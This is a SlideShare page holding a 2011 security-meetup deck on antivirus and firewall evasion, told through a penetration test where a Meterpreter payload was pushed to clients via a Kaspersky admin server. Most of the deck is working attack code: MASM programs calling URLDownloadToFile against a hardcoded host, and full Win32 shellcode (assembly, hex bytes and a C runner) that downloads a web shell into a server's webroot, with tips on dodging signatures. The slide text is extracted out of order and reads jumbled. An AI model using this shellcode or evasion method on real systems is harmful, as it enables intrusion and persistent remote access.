SlideShare une entreprise Scribd logo

Evolution of Download Deploy Sheelcode

n|u - The Open Security Community
n|u - The Open Security Community

Evolution of Download Deploy Sheelcode by Rahul Sasi @ null Mumbai Meet in January, 2011

Technologie
1  sur  7
Télécharger pour lire hors ligne
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Any way we dint give up and started attacking Antivirus/ Firewall the AV Admin server itself, and woot woot we Evasion Techniques: were in. Am not gone mention how I got in Evolution of Download Deploy coz u will laugh Shellcode and that is not the point , the point is I was able [FB1H2S aka Rahul Sasi] to get an RDP to Kaspersky admin server machine. And the fun begins. http://fb1h2s.com http://garage4hackers.com As it was Kasper-sky Admin server, and all the network machines were connected to it, and Overview: Admin server manages everything from updating individual computers with updates The effectiveness of an Anti virus/ Firewall is form patching the server. highly valued to it customers and in scenarios of a PenTest. This post talks about a serious of observations and techniques tried in order to Screenshots not live: form Kaspersky website: bypass AV and evaluate AV/Firewall's effectiveness and the development of Download Deploy payload. What made me write this? I was assigned with a PT which we were able to achieve 100% percent success. And the success rates were because of an Anti virus Server, ok here is the incident. [Skip this, its boring] After completing VA we moved on to PT, a good no of un patched windows systems were spotted so we armed msf(Metsploit) and started shooting, but exploits failed , and no What quickly strike me was the Push patches metpreters or Cmd shells came back. Well all options which were used to update client because of a stupid AV server. A Kasper-sky computer with patches and installers, quick server was running and that was used to taught! manage the entire network. Well payload encoding work but, certain vulnerabilities What If I make a Metpreter_reverse_tcp and multiple exploitation is not possible so if you fail push it as a patch to the client computers will it first you will lose the game, so different ideas work?? and taught s popped in my head and this paper is an implementation of that. Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” [2] I had situation before too, were server was behind a firewall and was not able to get reverse/bind shell because of AV/Firewall I need a way to bypass that. [3] Will the things I did above could be done with a domain controller too? Answer to Q no [3] by Wirless Punter" suggested a better strategy which he tried before. [-] Make a VBS or Bat script which creates a new Steps: user and then enable telnet. [+] Made the metpreter and moved to Admin [-] Push the script as update, simple and very server effective " [-] Admin server dint detect the default non encoded metpreter as a virus , No idea why :O Question No [1] and [2]'s answer is what this [+] Shut down the remote AV client form admin paper is all about server [-] Kaspersky Admin kit had a feature to build an installer out of an executable [+] Converted the metpreter .exe to .msi installer, seems like the AV signs the payload when this is done [+] Pushed it to client And royal woot woot we had a metpreter, same way we could have shelled the entire network , took enough POCs and headed home. Thanks to D4rkest for his great support and ideas. Well PT was over but few question remained And the best way to hack an application is RTFM[Read the f$$$$$# manual] http://utils.kaspersky.com/docs/engl...admguid een.pdf [1] Why did the AV admin server dint detect the Msf non encoded payload when moved to admin server, when it was getting detected on client machines? Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Anti Virus Evading techniques, and ;------------------------------------------ analyzing the quality of an AV - ; Comilied with MASM32 .586 .model flat,stdcall option casemap:none Signature based detection: Analyzing include C:masm32includewindows.inc Efficacy and Bypassing detection include C:masm32includeuser32.inc include C:masm32includekernel32.inc Wiki: include C:masm32includeshell32.inc include C:masm32includeurlmon.inc http://en.wikipedia.org/wiki/Antivirus_software includelib masm32libuser32.lib Compares the contents of a file to a dictionary includelib masm32libkernel32.lib of virus signatures. includelib masm32libshell32.lib includelib masm32liburlmon.lib Analyzing the efficacy of an AV: .data URL db "http://110.0.0.1:84/msgbox.exe",0 Test 1 EXIT db "ExitProcess" PATH db "c:testsas.exe",0 Testing for false positives, I started with a simple test shell code program, a skeleton that's .data res dd ? used to execute test shell codes, added few Nop instruction to it, "currently the exe is absolutely .code harmless". #include<stdio.h> ; --------------------http://FB1H2S.com char code[]="/x90/x90"; fb1h2s http://Garage4Hackers.com----------- int main(int argc, char **argv) ------------------------------------------- { - int (*func)(); func = (int (*)()) code; (int)(*func)(); start: } invoke URLDownloadToFile,0,addr URL,addr PATH,0,0 invoke ExitProcess,0 Uploaded to Virus total and obtained the following results. end start Here , Here: Ya one False positive by Quick heal. [-] Moved form C to ASM as now we could strike a little deeper [-] Build a quick download virus to destination payload Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” And on compiling and linking the application Without exit function the payload still works itself my AVG scanner popped alerting me the output executable was scanned and and my about the payload. AVG said it was clean. And that's how signature based detection works how dump it is. So function calls Urldownloadtofile + Exit process the combination would be what AVG would have build its signature with. Ok so what if I remove Exitprocess and compile the Heuristics: Considering shell codes it’s program. not affected much ;------------------------------------------- Runs the payload on a sandbox and identifies ; Comilied with MASM32 the behavior: AV plants hooks to certain critical .586 .model flat,stdcall system calls and monitors those activities , so option casemap:none Reverse/Bind shell and socket operations are at include C:masm32includewindows.inc times an Issue. include C:masm32includeuser32.inc include C:masm32includekernel32.inc include C:masm32includeshell32.inc include C:masm32includeurlmon.inc So the taught is how to bypass Signature includelib masm32libuser32.lib Detection + above mentioned Heuristics + includelib masm32libkernel32.lib Firewall issues includelib masm32libshell32.lib includelib masm32liburlmon.lib .data DownLoadFile + ExcuteFile + ExitProcess URL db "http://110.0.0.1:84/msgbox.exe",0 EXIT db "ExitProcess" PATH db "c:testsas.exe",0 .data No way this could escape the heuristic behavior res dd ? , well downloading a program won't create .code much panic but trying to execute it would cause suspicion .Well obviously it would not be of any ; --------------------http://FB1H2S.com fb1h2s use if the payload just downloads the file and http://Garage4Hackers.com----------------------- -------------------------------- dsn't trigger it, and triggering it is where the problem occurs. start: invoke URLDownloadToFile,0,addr URL,addr So what is the alternative? PATH,0,0 ;invoke ExitProcess,0 Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode end start
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” ;#File: Download_deploy.asm [+] Download Execute will cause troubles to our ; [BITS 32] payload. global _start [-] If we just download the executable that won’t be of any use _start: [+] And AV/Firewall could make situations tough jmp short entry ; by not letting us give reverse shell %include "kernal32.asm" [+] And if the application we are begin: targeting[Apache old version] is behind a call find_kernel32 mov ebx, eax firewall and even if we were able to execute jmp short u ; Skip code we can’t get a shell back because of the entry: firewall. call begin [-] So why not use a web shell , some Php or u: push 0xec0e4e8e ; LoadLibraryA hash asp shell if target has got a web server. push ebx ; kernel32 base address call find_function ; find address [+] A payload that would download a web shell and place it on the servers WebRoot directory. ; LoadLibraryA PUSH 0x00206e6f Or simply writes a new web shell . PUSH 0x6d6c7275 xor ecx, ecx mov [esp + 9],cl mov ecx , esp All firewall let's web server's traffic and push ecx WebShell's "Hardly I have seen any getting call eax ; eax holds our function address detected by AV" . So that budded the idea of a download: Download + Deploy payload. push 0x702f1a36 ; URLDownloadToFileAhash push eax ; u-lmon.dll base address call find_function ; find address Download + Executes triggers AV alert pop edi xor ebp, ebp So just Download a WebShell and PUSH 0x58202020 ; path to deploy PUSH 0x7073612e drops it in WebRoot PUSH 0x735c746f PUSH 0x6f727777 PUSH 0x775c6275 PUSH 0x7074656e PUSH 0x495c3a43 mov ebp , esp You could get a semi interactive shell and will xor ecx, ecx ; ecx = 0 we need it work fine even in case of AV and firewall. mov [ebp + 24], cl ;ebp no null PUSH 0x58202065 ; url to file ##################################### PUSH 0x78652e61 PUSH 0x2f34383a # Title ownload Deploy Shell code by FB1H2S PUSH 0x312e302e PUSH 0x302e3732 # Date: [18/1/2011] PUSH 0x312f2f3a # Author: FB1H2S PUSH 0x70747468 mov edi, esp # Tested on: [Works form win xp to Win 7 all mov [edi + 25], cl ; edi no null push ecx ; lpfnCB versions] push ecx ; dwReserved push ebp ; szFileName # Paths hardcoded, could port to msf push edi ;url #Place the webshell to be uploaded on ur local push ecx ; pCaller call eax ; eax holds our function a server webroot exit: push 0x73e2d87e ; ExitProcess hash push ebx ; kernel32 base address call find_function ; find address ; ExitProcess call eax ; holds our function address Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” ;# Test the Shell Code: ;# ;#Code file: kernal.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Code: ;;;;;;;;;;;;;; // Download file form location find_kernel32: //Url hardcoded so not Use full for all xor eax, eax ; clear eax yet mov eax, [fs:0x30 ] ; pointer to the PEB #include<stdio.h> mov eax, [ eax + 0x0C ] ; get PEB->Ldr mov eax, [ eax + 0x14 ] ; get PEB- char code[] = >Ldr.InMemoryOrderModuleList.Flink "xebx70x31xc0x64xa1x30x00" ; (1st entry) "x00x00x8bx40x0cx8bx40x14" mov eax, [ eax ] ; (2nd entry) "x8bx00x8bx00x8bx40x10xc3" mov eax, [ eax ] ; (3rd entry) mov eax, [ eax + 0x10 ] ;3rd entries base "x60x8bx6cx24x24x8bx45x3c" address "x8bx54x05x78x01xeax8bx4a" ; eax = kernel32.dll works on all windows "x18x8bx5ax20x01xebxe3x37" versions xp to win 7 "x49x8bx34x8bx01xeex31xff" ret "x31xc0xfcxacx84xc0x74x0a" "xc1xcfx0dx01xc7xe9xf1xff" find_function: "xffxffx3bx7cx24x28x75xde" pushad ; Save all "x8bx5ax24x01xebx66x8bx0c" registers mov ebp, [esp + 0x24] "x4bx8bx5ax1cx01xebx8bx04" mov eax, [ebp + 0x3c] "x8bx01xe8x89x44x24x1cx61" mov edx, [ebp + eax + 0x78] "xc3xe8x94xffxffxffx89xc3" add edx, ebp "xebx05xe8xf2xffxffxffx68" mov ecx, [edx + 0x18] mov ebx, [edx + 0x20] "x8ex4ex0execx53xe8x96xff" add ebx, ebp "xffxffx68x6fx6ex20x00x68" find_function_loop: "x75x72x6cx6dx31xc9x88x4c" jecxz find_function_finished "x24x09x89xe1x51xffxd0x68" dec ecx mov esi, [ebx + ecx * 4] "x36x1ax2fx70x50xe8x76xff" add esi, ebp "xffxffx5fx31xedx68x20x20" "x20x00x68x2ex61x73x70x68" compute_hash: "x6fx74x5cx73x68x77x77x72" xor edi, edi ; Zero edi xor eax, eax ; Zero eax "x6fx68x75x62x5cx77x68x6e" cld ; Clear "x65x74x70x68x43x3ax5cx49" direction "x89xe5x31xc9x88x4dx18x68" "x65x20x20x00x68x61x2ex65" compute_hash_again: lodsb ; Load the "x78x68x3ax38x34x2fx68x2e" next byte from esi into al "x30x2ex31x68x32x37x2ex30" test al, al ; Test "x68x3ax2fx2fx31x68x68x74" ourselves. "x74x70x89xe7x88x4fx1ax51" jz compute_hash_finished ; If the ZF is set, we've hit the null term. "x51x55x57x51xffxd0x68x7e" ror edi, 0xd ; Rotate "xd8xe2x73x53xe8x0fxffxff" edi 13 bits to the right "xffxffxd0"; add edi, eax ; Add the int main(int argc, char **argv) new byte to the accumulator jmp compute_hash_again ; Next { iteration int (*func)(); func = (int (*)()) code; compute_hash_finished: (int)(*func)(); find_function_compare: cmp edi, [esp + 0x28] } jnz find_function_loop mov ebx, [edx + 0x24] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 0x1c] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebp Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- mov [esp + 0x1c], eax Evolution-of-Download-Deploy-Shellcode find_function_finished: popad ; Restore all registers ret
http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” [+] Issues: Url and path are Hard Coded so its Use less I published the code to get suggestions so that I could make an Improved version of code and make a Metsploit module [-] Currently Web Root path is Hard coded and I can’t think about a way if web root is changed [-] Need a solution to dynamically finds the web roots IIS and Apache to make the Shell code better. [-] Codes and betters images form: http://www.garage4hackers.com/showthread.p hp?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode #And all greets to Garage Hackers and Null Members. #http://www.garage4hackers.com/forum.php B0Nd,Eberly,Wipu,Vinnu,w4ri0r,empty,neo,Ro hith,Sids786,SmartKD,Tia,d4rkest,Atul,beenu, Nishant,prashant Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode

Recommandé

Jms intro
Jms introJms intro
Jms introManav Prasad
 
Business Lifestyle Magazine - Outlook Business
Business Lifestyle Magazine - Outlook BusinessBusiness Lifestyle Magazine - Outlook Business
Business Lifestyle Magazine - Outlook Businesspurnima23
 
18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...
18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...
18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...Belén Rosado Domínguez
 
Trabalho Final
Trabalho FinalTrabalho Final
Trabalho Finalcarlosodilonbarros
 
Xpath
XpathXpath
XpathManav Prasad
 
Build Up An Evidence Factory
Build Up An Evidence FactoryBuild Up An Evidence Factory
Build Up An Evidence FactorySandor_Tomolak
 
Project Report Outlook (
Project Report Outlook (Project Report Outlook (
Project Report Outlook (Satyam Sharma
 
Entertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal Meet
Entertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal MeetEntertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal Meet
Entertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal MeetMuralikrishnan Padmakumar
 

Recommandé

Jms intro
Jms introJms intro
Jms introManav Prasad
 
Business Lifestyle Magazine - Outlook Business
Business Lifestyle Magazine - Outlook BusinessBusiness Lifestyle Magazine - Outlook Business
Business Lifestyle Magazine - Outlook Businesspurnima23
 
18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...
18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...
18 ciencias-de-la-naturaleza-2-eso-2-actividades-de-verano-dpto-de-fisica-y-q...Belén Rosado Domínguez
 
Trabalho Final
Trabalho FinalTrabalho Final
Trabalho Finalcarlosodilonbarros
 
Xpath
XpathXpath
XpathManav Prasad
 
Build Up An Evidence Factory
Build Up An Evidence FactoryBuild Up An Evidence Factory
Build Up An Evidence FactorySandor_Tomolak
 
Project Report Outlook (
Project Report Outlook (Project Report Outlook (
Project Report Outlook (Satyam Sharma
 
Entertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal Meet
Entertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal MeetEntertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal Meet
Entertainment-Movies Quiz ( Pulp Facts ) at Quizics Informal MeetMuralikrishnan Padmakumar
 
Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primern|u - The Open Security Community
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Nmap basics
Nmap basicsNmap basics
Nmap basicsn|u - The Open Security Community
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primaryn|u - The Open Security Community
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3n|u - The Open Security Community
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLFn|u - The Open Security Community
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teamingn|u - The Open Security Community
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logsn|u - The Open Security Community
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodann|u - The Open Security Community
 
Cloud security
Cloud security Cloud security
Cloud security n|u - The Open Security Community
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windowsn|u - The Open Security Community
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usagen|u - The Open Security Community
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Processn|u - The Open Security Community
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Securityn|u - The Open Security Community
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacksn|u - The Open Security Community
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackersn|u - The Open Security Community
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentestingn|u - The Open Security Community
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 

Contenu connexe

Plus de n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Plus de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Dernier

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 

Dernier (20)

Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 

Evolution of Download Deploy Sheelcode

  • 1. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Any way we dint give up and started attacking Antivirus/ Firewall the AV Admin server itself, and woot woot we Evasion Techniques: were in. Am not gone mention how I got in Evolution of Download Deploy coz u will laugh Shellcode and that is not the point , the point is I was able [FB1H2S aka Rahul Sasi] to get an RDP to Kaspersky admin server machine. And the fun begins. http://fb1h2s.com http://garage4hackers.com As it was Kasper-sky Admin server, and all the network machines were connected to it, and Overview: Admin server manages everything from updating individual computers with updates The effectiveness of an Anti virus/ Firewall is form patching the server. highly valued to it customers and in scenarios of a PenTest. This post talks about a serious of observations and techniques tried in order to Screenshots not live: form Kaspersky website: bypass AV and evaluate AV/Firewall's effectiveness and the development of Download Deploy payload. What made me write this? I was assigned with a PT which we were able to achieve 100% percent success. And the success rates were because of an Anti virus Server, ok here is the incident. [Skip this, its boring] After completing VA we moved on to PT, a good no of un patched windows systems were spotted so we armed msf(Metsploit) and started shooting, but exploits failed , and no What quickly strike me was the Push patches metpreters or Cmd shells came back. Well all options which were used to update client because of 